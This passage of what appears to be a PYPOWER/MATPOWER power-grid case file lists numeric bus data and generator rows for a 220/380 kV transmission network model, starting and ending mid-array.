0, 220.0, 0, 1.1, 0.9 ], [412, 1, 2.198596, 0.439719, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [413, 1, 109.757857, 21.951571, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [414, 1, 9.31963, 1.863926, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [415, 1, 0, 0, 0, 0, 0, 1.000346, 0, 380.0, 0, 1.1, 0.9 ], [416, 1, 132.72133, 26.544266, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [417, 1, 5.193132, 1.038626, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [418, 1, 108.221751, 21.64435, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [419, 1, 57.843756, 11.568751, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [420, 1, 58.236908, 11.647382, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [421, 1, 83.888781, 16.777756, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [422, 1, 61.459733, 12.291947, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [423, 1, 129.07902, 25.815804, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [424, 1, 9.306265, 1.861253, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [425, 1, 76.427915, 15.285583, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [426, 1, 6.332288, 1.266458, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [427, 1, 53.216652, 10.64333, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [428, 1, 23.860695, 4.772139, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [429, 1, 269.262283, 53.852457, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [430, 1, 143.426757, 28.685351, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [431, 1, 95.911675, 19.182335, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [432, 1, 112.114864, 22.422973, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [433, 1, 57.31013, 11.462026, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [434, 1, 29.826983, 5.965397, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [435, 1, 119.289154, 23.857831, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [436, 1, 63.686478, 12.737296, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [437, 1, 14.503927, 2.900785, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [438, 1, 38.924569, 7.784914, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [439, 1, 72.472515, 14.494503, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [440, 1, 61.246681, 12.249336, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [441, 1, 46.953787, 9.390757, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [442, 1, 62.135755, 12.427151, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [443, 1, 134.716165, 26.943233, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [444, 1, 0, 0, 0, 0, 0, 0.999998, 0, 380.0, 0, 1.1, 0.9 ], [445, 1, 61.213469, 12.242694, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [446, 1, 28.384136, 5.676827, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [447, 1, 53.963789, 10.792758, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [448, 1, 39.657905, 7.931581, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [449, 1, 199.968585, 39.993717, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [450, 1, 122.371232, 24.474246, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [451, 1, 52.289831, 10.457966, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [452, 1, 0, 0, 0, 0, 0, 0.999998, 0, 380.0, 0, 1.1, 0.9 ], [453, 1, 35.044332, 7.008866, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [454, 1, 24.449237, 4.889847, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [455, 1, 39.862424, 7.972485, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [456, 1, 39.862424, 7.972485, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [457, 1, 122.248059, 24.449612, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [458, 1, 116.273318, 23.254664, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [459, 1, 141.508954, 28.301791, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [460, 1, 185.971921, 37.194384, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [461, 1, 193.451125, 38.690225, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [462, 1, 59.177702, 11.83554, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [463, 1, 30.323025, 6.064605, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [464, 1, 30.359678, 6.071936, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [465, 1, 49.039179, 9.807836, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [466, 1, 39.813609, 7.962722, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [467, 1, 36.741369, 7.348274, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [468, 1, 60.241322, 12.048264, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [469, 1, 37.33034, 7.466068, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [470, 1, 95.066049, 19.01321, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [471, 1, 93.601098, 18.72022, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [472, 1, 32.738843, 6.547769, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [473, 1, 60.116322, 12.023264, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [474, 1, 31.049452, 6.20989, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [475, 1, 30.47033, 6.094066, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [476, 1, 34.436486, 6.887297, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [477, 1, 55.57304, 11.114608, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [478, 1, 69.809867, 13.961973, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [479, 1, 126.510984, 25.302197, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [480, 1, 55.452056, 11.090411, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [481, 1, 48.157133, 9.631427, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [482, 1, 54.680352, 10.93607, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [483, 1, 46.501632, 9.300326, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [484, 1, 36.455018, 7.291004, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [485, 1, 54.454148, 10.89083, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [486, 1, 500.951562, 100.190312, 0, 0, 0, 0.999642, 0, 220.0, 0, 1.1, 0.9 ], [487, 1, 126.93881, 25.387762, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [488, 1, 365.768183, 73.153637, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [489, 1, 96.269145, 19.253829, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [490, 1, 29.955368, 5.991074, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [491, 1, 41.189015, 8.237803, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [492, 1, 64.23058, 12.846116, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [493, 1, 82.785529, 16.557106, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [494, 1, 113.145107, 22.629021, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [495, 1, 89.065421, 17.813084, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [496, 1, 6.308652, 1.26173, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [497, 1, 788.895009, 157.779002, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [498, 1, 36.998465, 7.399693, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [499, 1, 51.643795, 10.328759, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [500, 1, 28.27437, 5.654874, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [501, 1, 47.835359, 9.567072, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [502, 1, 188.796256, 37.759251, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [503, 1, 57.820929, 11.564186, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [504, 1, 37.86386, 7.572772, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [505, 1, 268.559873, 53.711975, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [506, 1, 84.297639, 16.859528, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [507, 1, 80.184894, 16.036979, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [508, 1, 116.571287, 23.314257, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [509, 1, 153.617835, 30.723567, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [510, 1, 97.049563, 19.409913, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [511, 1, 84.65687, 16.931374, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [512, 1, 55.921089, 11.184218, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [513, 1, 30.806553, 6.161311, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [514, 1, 76.674528, 15.334906, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [515, 1, 68.398234, 13.679647, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [516, 1, 76.52153, 15.304306, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [517, 1, 35.943994, 7.188799, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [518, 1, 202.438852, 40.48777, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [519, 1, 19.923689, 3.984738, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [520, 1, 80.439646, 16.087929, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [521, 1, 72.664316, 14.532863, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [522, 1, 62.215776, 12.443155, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [523, 1, 33.490045, 6.698009, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [524, 1, 97.204561, 19.440912, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [525, 1, 115.803556, 23.160711, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [526, 1, 35.10946, 7.021892, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [527, 1, 38.54772, 7.709544, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [528, 1, 84.134004, 16.826801, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [529, 1, 107.847334, 21.569467, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [530, 1, 45.701295, 9.140259, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [531, 1, 46.466142, 9.293228, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [532, 1, 44.599397, 8.919879, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [533, 1, 39.966441, 7.993288, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [534, 1, 110.249811, 22.049962, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [535, 1, 138.025688, 27.605138, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [536, 1, 108.793987, 21.758797, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [537, 1, 36.191276, 7.238255, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [538, 1, 27.054129, 5.410826, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [539, 1, 28.706094, 5.741219, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [540, 1, 25.848577, 5.169715, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [541, 1, 66.769105, 13.353821, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [542, 1, 91.720112, 18.344022, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [543, 1, 50.097074, 10.019415, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [544, 1, 93.306504, 18.661301, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [545, 1, 200.904205, 40.180841, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [546, 1, 100.696222, 20.139244, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [547, 1, 130.156483, 26.031297, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [548, 1, 42.132192, 8.426438, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [549, 1, 36.026626, 7.205325, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [550, 1, 29.728094, 5.945619, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [551, 1, 28.657165, 5.731433, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [552, 1, 142.308254, 28.461651, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [553, 1, 0.984553, 0.196911, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [554, 1, 144.173118, 28.834624, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [555, 1, 54.931554, 10.986311, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [556, 1, 84.980942, 16.996188, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [557, 1, 180.553929, 36.110786, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [558, 1, 106.465194, 21.293039, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [559, 1, 56.979146, 11.395829, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [560, 1, 89.014907, 17.802981, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [561, 1, 48.813176, 9.762635, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [562, 1, 133.353941, 26.670788, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [563, 1, 93.758688, 18.751738, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [564, 1, 185.126791, 37.025358, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [565, 1, 139.687337, 27.937467, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [566, 1, 0.224368, 0.044874, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [567, 1, 227.068031, 45.413606, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [568, 1, 209.982989, 41.996598, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [569, 1, 147.745506, 29.549101, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [570, 1, 230.65734, 46.131468, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [571, 1, 169.827486, 33.965497, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [572, 1, 299.547331, 59.909466, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [573, 1, 87.194301, 17.43886, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [574, 1, 166.13844, 33.227688, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [575, 1, 3.122039, 0.624408, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [576, 1, 202.023229, 40.404646, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [577, 1, 222.709549, 44.54191, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [578, 1, 212.63562, 42.527124, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [579, 1, 77.575277, 15.515055, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [580, 1, 16.150018, 3.230004, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [581, 1, 0.0928, 0.01856, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [582, 1, 58.430849, 11.68617, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [583, 1, 67.018037, 13.403607, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [584, 1, 38.45174, 7.690348, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [585, 1, 66.756951, 13.35139, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ] ]) ppc["gen"] = array([ [586, 0.0, 0, 9999, -9999, 1.0, 100, 1, 272.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [589, 63.1, 0, 9999, -9999, 1.0, 100, 1, 63.1, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [590, 38.0, 0, 9999, -9999, 1.0, 100, 1, 38.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [593, 11.1, 0, 9999, -9999, 1.0, 100, 1, 11.1, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [595, 1633.617226, 0, 9999, -9999, 1.0, 100, 1, 4730.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [598, 12.0, 0, 9999, -9999, 1.0, 100, 1, 12.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [599, 9.3, 0, 9999, -9999, 1.0, 100, 1, 9.3, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [601, 61.5, 0, 9999, -9999, 1.0, 100, 1, 61.5, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [602, 24.6, 0, 9999, -9999, 1.0, 100, 1, 24.6, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [603, 1590.736433, 0, 9999, -9999, 1.0, 100, 1, 3455.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [607, 1800.0, 0, 9999, -9999, 1.0, 100, 1, 1800.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [608, 24.0, 0, 9999, -9999, 1.0, 100, 1, 24.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [609, 36.4, 0, 9999, -9999, 1.0, 100, 1, 36.4, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [612, 30.0, 0, 9999, -9999, 1.0, 100, 1, 30.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [614, 30.0, 0, 9999, -9999, 1.0, 100, 1, 30.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [616, 29.0, 0, 9999, -9999, 1.0, 100, 1, 29.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [617, 137.0, 0, 9999, -9999, 1.0, 100, 1, 137.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [618, 33.4, 0, 9999, -9999, 1.0, 100, 1, 33.4, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [619, 118.0, 0, 9999, -9999, 1.0, 100, 1, 118.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [624, 27.0, 0, 9999, -9999, 1.0, 100, 1, 27.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [629, 75.3, 0, 9999, -9999, 1.0, 100, 1, 75.3, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [632, 45.1, 0, 9999, -9999, 1.0, 100, 1, 45.1, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [637, 53.7, 0, 9999, -9999, 1.0, 100, 1, 53.7, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [638, 128.7, 0, 9999, -9999, 1.0, 100, 1, 128.7, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [640, 12.0, 0, 9999, -9999, 1.0, 100, 1, 12.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [641, 12.6, 0, 9999, -9999, 1.0, 100, 1, 12.6, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [642, 28.9, 0, 9999, -9999, 1.0, 100, 1, 28.9, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [643, 857.0, 0, 9999, -9999, 1.0, 100, 1, 857.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [647, 14.0, 0, 9999, -9999, 1.0, 100, 1, 14.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [652, 46.9, 0, 9999, -9999, 1.0, 100, 1, 46.9, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [655, 61.5, 0, 9999, -9999, 1.0, 100, 1, 61.5, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [661, 27.830879, 0, 9999, -9999, 1.0, 100, 1, 32.7, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [663, 15.0, 0, 9999, -9999, 1.0, 100, 1, 15.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [666, 28.9, 0, 9999, -9999, 1.0, 100, 1, 28.9, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [668, 766.0, 0, 9999, -9999, 1.0, 100, 1, 766.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [670, 24.0, 0, 9999, -9999, 1.0, 100, 1, 24.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [672, 33.1, 0, 9999, -9999, 1.0, 100, 1, 33.1, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [681, 40.1, 0, 9999, -9999, 1.0, 100, 1, 40.1, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [683, 27.5, 0, 9999, -9999, 1.0, 100, 1, 27.5, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [687, 1329.0, 0, 9999, -9999, 1.0, 100, 1, 1329.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [694, 16.4, 0, 9999, -9999, 1.0, 100, 1, 16.4, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [695, 14.7, 0, 9999, -9999, 1.0, 100, 1, 14.7, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [696, 721.0, 0, 9999, -9999, 1.0, 100, 1, 721.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [697, 11.6, 0, 9999, -9999, 1.0, 100, 1, 11.6, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [698, 24.0, 0, 9999, -9999, 1.0, 100, 1, 24.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [702, 73.4, 0, 9999, -9999, 1.0, 100, 1, 73.4, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [704, 508.0, 0, 9999, -9999, 1.0, 100, 1, 508.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [705, 17.0, 0, 9999, -9999, 1.0, 100, 1, 17.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [707, 34.0, 0, 9999, -9999, 1.0, 100, 1, 34.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [713, 13.4, 0, 9999, -9999, 1.0, 100, 1, 13.4, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [714, 15.0, 0, 9999, -9999, 1.0, 100, 1, 15.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [716, 0.1, 0, 9999, -9999, 1.0, 100, 1, 0.1, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [717, 11.0, 0, 9999, -9999, 1.0, 100, 1, 11.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [719, 1218.953262, 0, 9999, -9999, 1.0, 100, 1, 1958.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [724, 12.1, 0, 9999, -9999, 1.0, 100, 1, 12.1, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [730, 633.2, 0, 9999, -9999, 1.0, 100, 1, 633.2, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [732, 14.6, 0, 9999, -9999, 1.0, 100, 1, 14.6, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [735, 84.8, 0, 9999, -9999, 1.0, 100, 1, 84.8, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [738, 138.5, 0, 9999, -9999, 1.0, 100, 1, 138.5, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [741, 214.0, 0, 9999, -9999, 1.0, 100, 1, 214.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [742, 9.0, 0, 9999, -9999, 1.0, 100, 1, 9.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [743, 732.398079, 0, 9999, -9999, 1.0, 100, 1, 1410.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [747, 12.5, 0, 9999, -9999, 1.0, 100, 1, 12.5, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [748, 110.0, 0, 9999, -9999, 1.0, 100, 1, 110.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [749, 16.0, 0, 9999, -9999, 1.0, 100, 1, 16.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [750, 90.8, 0, 9999, -9999, 1.0, 100, 1, 90.8, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [753, 311.8, 0, 9999, -9999, 1.0, 100, 1, 311.8, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [758, 18.5, 0, 9999, -9999, 1.0, 100, 1, 18.5, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [761, 15.7, 0, 9999, -9999, 1.0, 100, 1, 15.7, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [762, 1105.0, 0, 9999, -9999, 1.0, 100, 1, 1105.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [763, 20.3, 0, 9999, -9999, 1.0, 100, 1, 20.3, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [765, 59.0, 0, 9999, -9999, 1.0, 100, 1, 59.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [767, 11.2, 0, 9999, -9999, 1.0, 100, 1, 11.2, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [769, 43.3, 0, 9999, -9999, 1.0, 100, 1, 43.3, 0.0, 0, 0, 0, 0, 0, 0, 